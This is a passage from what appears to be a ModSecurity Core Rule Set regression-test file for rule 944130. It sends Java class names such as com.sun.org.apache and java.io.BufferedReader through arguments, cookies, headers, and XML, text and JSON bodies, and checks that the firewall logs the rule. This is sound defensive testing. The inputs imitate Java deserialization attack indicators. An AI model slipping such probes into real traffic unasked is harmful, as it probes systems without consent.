"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-12 - desc: "Argument name includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "com.sun.org.apache=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-13 - desc: "Cookie test includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.sun.org.apache - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-14 - desc: "Cookie name includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.sun.org.apache=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-15 - desc: "Request header test includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity 
CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.sun.org.apache - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-16 - desc: "XML attribute value includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-17 - desc: "XML element value includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-18 - desc: "Nested XML element value includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-19 - desc: "Content-Type text/plain includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-20 - desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"com.sun.org.apache\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-21 - desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"com.sun.org.apache\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-22 - desc: "Argument test includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-23 - desc: "Argument name includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-24 - desc: "Cookie test includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - 
Cookie: test=java.io.BufferedInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-25 - desc: "Cookie name includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedInputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-26 - desc: "Request header test includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-27 - desc: "XML attribute value includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: 
"POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-28 - desc: "XML element value includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-29 - desc: "Nested XML element value includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-30 - desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - - - 
test_title: 944130-31 - desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedInputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-32 - desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.BufferedInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-33 - desc: "Argument test includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-34 - desc: 
"Argument name includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedReader=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-35 - desc: "Cookie test includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-36 - desc: "Cookie name includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedReader=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-37 - desc: "Request header test includes keyword 
java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedReader - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-38 - desc: "XML attribute value includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-39 - desc: "XML element value includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-40 - desc: "Nested XML element value includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-41 - desc: "Content-Type text/plain includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-42 - desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedReader\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-43 - desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.BufferedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-44 - desc: "Argument test includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-45 - desc: "Argument name includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-46 - desc: "Cookie test includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-47 - desc: "Cookie name includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayInputStream=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-48 - desc: "Request header test includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayInputStream - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-49 - desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 
Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-50 - desc: "XML element value includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-51 - desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-52 - desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-53 - desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayInputStream\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-54 - desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-55 - desc: "Argument test includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-56 - desc: "Argument name includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-57 - desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" - stages: - - - stage: 